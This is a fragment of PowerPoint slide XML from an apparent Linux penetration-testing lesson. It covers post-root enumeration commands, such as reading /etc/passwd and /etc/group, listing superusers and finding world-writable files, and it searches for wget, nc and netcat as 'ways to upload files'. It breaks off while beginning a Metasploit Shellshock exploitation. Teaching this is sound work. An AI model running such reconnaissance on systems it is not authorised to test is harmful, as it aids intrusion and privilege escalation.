              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> which jobs are scheduled</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1620375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After gaining root access…</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75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Communications &amp; networking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/networks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>antup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> other users and hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Confidential information &amp; users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>id, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, w, last </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/passwd | cut -d: -f1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> list of users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}’  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> list of super users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/passwd, cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> sensitive files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4194563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After gaining root access…</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75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>find /etc/ -readable -type f 2&gt;/dev/null </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> available to anyone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /var/log, ls -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /var/mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> search var folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>find / -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xdev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -type d \( -perm -0002 -a ! -perm -1000 \) –print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> print word writeable files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>find /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xdev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> \( -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nouser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -o -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nogroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> \) –print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> no owner files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Preparation &amp; find exploit code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>find / -name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> can do the same for python*, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>* , find installed tools/languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>find / -name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>*, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>*, ftp, find ways to upload files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>A lot more information in this blog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1999722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ko-KR" dirty="0"/>
              <a:t>Exploit Shellshock vulnerability</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sz="1500" dirty="0"/>
              <a:t>Exploiting Shellshock using the DHCP service on Metasploit. It’s already installed in Kali.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dhclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> to find out your DHCP address on terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>In Metasploit, run ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search shellshock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>’. We will use </a:t>
            </a:r>
            <a:r>
